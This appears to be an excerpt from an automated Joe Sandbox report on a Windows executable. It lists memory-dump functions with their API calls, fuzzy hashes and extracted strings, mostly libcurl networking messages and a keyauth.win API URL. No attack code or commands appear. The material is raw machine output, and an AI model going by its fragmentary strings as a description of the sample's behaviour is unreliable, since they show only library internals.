                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 2235685d1bd13b24c76ffc2ea7d855fa4edaccd02b99331bdd79d568c78d06ab
                                            • Instruction ID: 999d307da7a8b0a75de5146521ef5690066d5515b142d334be6d6100fed93fc7
                                            • Opcode Fuzzy Hash: 2235685d1bd13b24c76ffc2ea7d855fa4edaccd02b99331bdd79d568c78d06ab
                                            • Instruction Fuzzy Hash: 93310B36A08A56C2E710AF12E824679B765FB84FD4F984032DE8E87B58CF3CD895C711
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 6a71efeabdaa36d73244b4352c5f5012b7b3ec64435facd515957462087f5632
                                            • Instruction ID: 2ccf6a75068aa342ec2deb2fe02caccd83b00fceea6684b96b9081c96d0eb022
                                            • Opcode Fuzzy Hash: 6a71efeabdaa36d73244b4352c5f5012b7b3ec64435facd515957462087f5632
                                            • Instruction Fuzzy Hash: 7A218836608A46C2D710AF21F865969B764FB88F95F940532DE8E83728CF3CD8998751
                                            APIs
                                            • strchr.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,00007FF7E5A32AB3), ref: 00007FF7E5A33748
                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,00007FF7E5A32AB3), ref: 00007FF7E5A3378A
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00007FF7E5A32AB3), ref: 00007FF7E5A3382F
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00007FF7E5A32AB3), ref: 00007FF7E5A33842
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A33D27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$memcpystrchr
                                            • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                            • API String ID: 1438451818-3030351490
                                            • Opcode ID: a8182fd0dfdacbe33f9d3f9c7374c26c3e360a6d2655ff1bf9f5d1c61c0da78b
                                            • Instruction ID: 97a92c8f5a6f73f9df9f5725d0cf17ca6dbf5e8f08b2628647c53dd77a228f6f
                                            • Opcode Fuzzy Hash: a8182fd0dfdacbe33f9d3f9c7374c26c3e360a6d2655ff1bf9f5d1c61c0da78b
                                            • Instruction Fuzzy Hash: 5F02AF61B0C7CA46E710AA669464BBDAF95AF44F9CF844033DE0DC7786EE78D844C362
                                            APIs
                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF7E5A08FA8), ref: 00007FF7E5A090F5
                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF7E5A08FA8), ref: 00007FF7E5A0910F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strncmp
                                            • String ID: I32$I64$Internal error removing splay node = %d
                                            • API String ID: 1114863663-13178787
                                            • Opcode ID: 9e80ba9495084d9940152a93fe6650defdac990b8f6d3432b4772d1b7d51b77b
                                            • Instruction ID: 403b253a90c78e8e00d8daf9c116c41a081993ad523a9b7f34927cfdaeee9d81
                                            • Opcode Fuzzy Hash: 9e80ba9495084d9940152a93fe6650defdac990b8f6d3432b4772d1b7d51b77b
                                            • Instruction Fuzzy Hash: 59A19532B196458AEB20AF25E464B7EBFA4FB48B4CF854136DA9D83254DF3CD208C751
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
                                            • API String ID: 1294909896-116363806
                                            • Opcode ID: 2a7a42c719cfc41e9ecda004752248a4e22455c9d79dbc273a396cbd76637f1d
                                            • Instruction ID: 18103358383284ce4e676f2c29118bab0b6eb8b6beed813aa78f1a7060708bc4
                                            • Opcode Fuzzy Hash: 2a7a42c719cfc41e9ecda004752248a4e22455c9d79dbc273a396cbd76637f1d
                                            • Instruction Fuzzy Hash: DF915A72704F8986EB109F25E8A4AAE7BA4FB44F88F940136DE4D87764DF38D445CB11
                                            APIs
                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7E59FA92A,?,?,?,?,?,?,?,00007FF7E59FA6F7), ref: 00007FF7E5A17911
                                            • strchr.VCRUNTIME140(?,?,?,00000000,TRUE,?,00000000,00000000,00000000,?), ref: 00007FF7E5A17AB3
                                            • strchr.VCRUNTIME140(?,?,?,00000000,TRUE,?,00000000,00000000,00000000,?), ref: 00007FF7E5A17AD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$_errno
                                            • String ID: 0123456789ABCDEF$0123456789abcdef$TRUE
                                            • API String ID: 2644425738-1191287149
                                            • Opcode ID: 6731cf7eb79fe99fc956e7da2918d2a85c4fd8fba441eb85d481e59dff622fac
                                            • Instruction ID: 7a9708d4c44badafb83069dffb085112ffd2320f555b9b0530c60320fc011db8
                                            • Opcode Fuzzy Hash: 6731cf7eb79fe99fc956e7da2918d2a85c4fd8fba441eb85d481e59dff622fac
                                            • Instruction Fuzzy Hash: 0751F752B0D6CE41EA61AB249660B7AEB90AF45F48FD45032D94ECA746DF3CD541C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$free
                                            • String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$TRUE
                                            • API String ID: 573759493-910067264
                                            • Opcode ID: 526dd6a61990846182b873f93f743bd90d9af5d28ecef45840b88224687b0280
                                            • Instruction ID: be7b3a91f5cc6c9cd9f9fc51ee768ea9693a29c9c85bd9dac7977160b77411ea
                                            • Opcode Fuzzy Hash: 526dd6a61990846182b873f93f743bd90d9af5d28ecef45840b88224687b0280
                                            • Instruction Fuzzy Hash: 5761E361B0D69A89FB21AF649524B7DEF95AF01F88FD44033C68E82694DF3CD541C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup
                                            • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                            • API String ID: 1169197092-2292467869
                                            • Opcode ID: 90133f61e9f3a2972452251f6a672964b389b412b9e8e14f35b27df89e8546ac
                                            • Instruction ID: b38b5cad954b385bae0a1d0c497d6a17ed70032620cf3dd2fa68974e4ef36ef6
                                            • Opcode Fuzzy Hash: 90133f61e9f3a2972452251f6a672964b389b412b9e8e14f35b27df89e8546ac
                                            • Instruction Fuzzy Hash: B6618221A0979A45FF71AB25A0643FAE792EF54F54F880037DB8D82691DF3CE4948372
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup$strchr
                                            • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                            • API String ID: 3404610657-2292467869
                                            • Opcode ID: 62dffb43bf084e46f221ed9f2adcc8f6b7e67df89a3940d09ae168eab1eb17b1
                                            • Instruction ID: b723ce5d256527e86c6d5bad65e8e44e852db176cad91f39dbbcc8a1f54b3713
                                            • Opcode Fuzzy Hash: 62dffb43bf084e46f221ed9f2adcc8f6b7e67df89a3940d09ae168eab1eb17b1
                                            • Instruction Fuzzy Hash: F3619361A0978A45FF71AB25A0643FAE7A1EF54F54F880037DB8D82691DF3CE4948372
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freememcpy$malloc
                                            • String ID: Failed to alloc scratch buffer!
                                            • API String ID: 169112436-1446904845
                                            • Opcode ID: 983475b5252fee3b519ee8893d5ff2ec22a28cab796edf3ac853c7e78d6e9305
                                            • Instruction ID: da2b7d7ef85b08a991a7ff9efa443a458250f47c81ad756a7b690a9cdd78442a
                                            • Opcode Fuzzy Hash: 983475b5252fee3b519ee8893d5ff2ec22a28cab796edf3ac853c7e78d6e9305
                                            • Instruction Fuzzy Hash: 7A519D2671878996EA25EB65A410BAABBA0FF08B84F840036CF8D97751DF3CE154C321
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strstr
                                            • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
                                            • API String ID: 1392478783-2096918210
                                            • Opcode ID: 6e3d0a3c5aa691337795dccfca836fcde4962f08d3d7d525d14d9e7aa75dc6f1
                                            • Instruction ID: c30bb53d74a0cf632b1cada13b28161397b802006405989572b3be4a6181fe4e
                                            • Opcode Fuzzy Hash: 6e3d0a3c5aa691337795dccfca836fcde4962f08d3d7d525d14d9e7aa75dc6f1
                                            • Instruction Fuzzy Hash: 94513966B0978945FB24BB68A455BB8FB90EF06B64FC40237CA5D826C1DF7CE4818712
                                            APIs
                                            • memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5E61
                                            • memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5EA5
                                            • memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5EBD
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5F42
                                              • Part of subcall function 00007FF7E5A3F1F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF7E59E43EE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E5A3F20A
                                            • memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5F74
                                            • memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5F8F
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59E5FAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                            • String ID:
                                            • API String ID: 1155477157-0
                                            • Opcode ID: 294cce447d60880335344067cce1c8243e8d16be0f0136f9d3ef8275642a61a9
                                            • Instruction ID: ec047452d5502db9fd694d81a0d9f25e78531e2cdfc44876c73c50ad987d0f07
                                            • Opcode Fuzzy Hash: 294cce447d60880335344067cce1c8243e8d16be0f0136f9d3ef8275642a61a9
                                            • Instruction Fuzzy Hash: 3551D032A08B8991EA14AF25D5143ACA3A1FB14FD4F940A36DF2E873D1CF78E191D352
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastfreememcpy
                                            • String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout!
                                            • API String ID: 1248052217-2335292235
                                            • Opcode ID: fa97018fce896f81ca5d4429d1ceceda691d05f0cb1cad433c6317878a5e6d84
                                            • Instruction ID: 1118dd5428e75cfbd0449e2873e25d0a57cef16d2ee8b2acedfa0626dc8fc573
                                            • Opcode Fuzzy Hash: fa97018fce896f81ca5d4429d1ceceda691d05f0cb1cad433c6317878a5e6d84
                                            • Instruction Fuzzy Hash: 04510726B0C68A85FB24BA298421BB99B90BF46F94FC44133DE4DD72C1EF3CE5448712
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc
                                            • String ID: Signature: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$Signature
                                            • API String ID: 2190258309-3231818857
                                            • Opcode ID: 486b11a5dbf6f6220d0470a4a60f1b5c1fbc44e62c4a92e0fa326115e51303ef
                                            • Instruction ID: e551ad0b8c27d8f4ed8ecd8700a19e663875a8dd406c6004682fb981ec9acb62
                                            • Opcode Fuzzy Hash: 486b11a5dbf6f6220d0470a4a60f1b5c1fbc44e62c4a92e0fa326115e51303ef
                                            • Instruction Fuzzy Hash: 6651BF62B0C68A81EA159B24E424BBDEBA4EF45F98F940033DA8D83754CF3CD605C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Digest$stale$true
                                            • API String ID: 1294909896-2487968700
                                            • Opcode ID: 29f2d144675f23a553318cadf2dbd3e2c172a0bf61d37d97765e181fdbbf1ba6
                                            • Instruction ID: 5c93a11897f04c313ee5b0b51afc65d8c1b5acc1b1adcfb5df649213c88b4408
                                            • Opcode Fuzzy Hash: 29f2d144675f23a553318cadf2dbd3e2c172a0bf61d37d97765e181fdbbf1ba6
                                            • Instruction Fuzzy Hash: 5751A521B08A4A82EB20AB21E9607BDAB91FF45F88F944132DB9D876C1DF3CD555C721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memchrmemcpyrecvfrom
                                            • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                                            • API String ID: 3107918033-477593554
                                            • Opcode ID: b5abf7ddbc41a4e4313125dd5a2000d1c180a3dd02d87012433adc899920b445
                                            • Instruction ID: 637f5cf6e84287266b1d4be8d1a0018444a824437b2066b9707349052c2136ef
                                            • Opcode Fuzzy Hash: b5abf7ddbc41a4e4313125dd5a2000d1c180a3dd02d87012433adc899920b445
                                            • Instruction Fuzzy Hash: 1B51E465B0858A85EB64AB259432BB9AB90FF44F84F844133EF4D97785DE3CE405CB21
                                            APIs
                                              • Part of subcall function 00007FF7E59E6DD0: memcpy.VCRUNTIME140(?,?,?,?,00000000,00007FF7E59E23CB), ref: 00007FF7E59E6E4E
                                              • Part of subcall function 00007FF7E59E6DD0: memcpy.VCRUNTIME140(?,?,?,?,00000000,00007FF7E59E23CB), ref: 00007FF7E59E6E5C
                                              • Part of subcall function 00007FF7E59E6DD0: memcpy.VCRUNTIME140(?,?,?,?,00000000,00007FF7E59E23CB), ref: 00007FF7E59E6E72
                                              • Part of subcall function 00007FF7E59E3BB0: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E3BF6
                                              • Part of subcall function 00007FF7E59E5DD0: memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5E61
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2469
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E24A8
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E24F6
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2544
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                            • String ID: at line $, column
                                            • API String ID: 2665656946-191570568
                                            • Opcode ID: 57100d119804690e628be863f834d55bd5b6b334a7ff37d4b486aad42ae39a7f
                                            • Instruction ID: 1ac3f90ceae40065a0c9f288462a9f94239f70203fef4eab2e730d591703cdf5
                                            • Opcode Fuzzy Hash: 57100d119804690e628be863f834d55bd5b6b334a7ff37d4b486aad42ae39a7f
                                            • Instruction Fuzzy Hash: 3A51B062F08B8985FB00EBB4E4543EC6762EB44BA8F405232DA6D93BD9DF38D085D351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1941130848-4020994737
                                            • Opcode ID: 995a1957d159ea99697b42c3a6b6bf0ff12af625b36380b0b66350f6ea9b707c
                                            • Instruction ID: bdac439706ff7f1863aff257b6932c96696549700e8127efb7c41190c6377146
                                            • Opcode Fuzzy Hash: 995a1957d159ea99697b42c3a6b6bf0ff12af625b36380b0b66350f6ea9b707c
                                            • Instruction Fuzzy Hash: 2B41D605B0D28A45FA62A711A022779AF91AF06F54F880176DA9E967C1EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
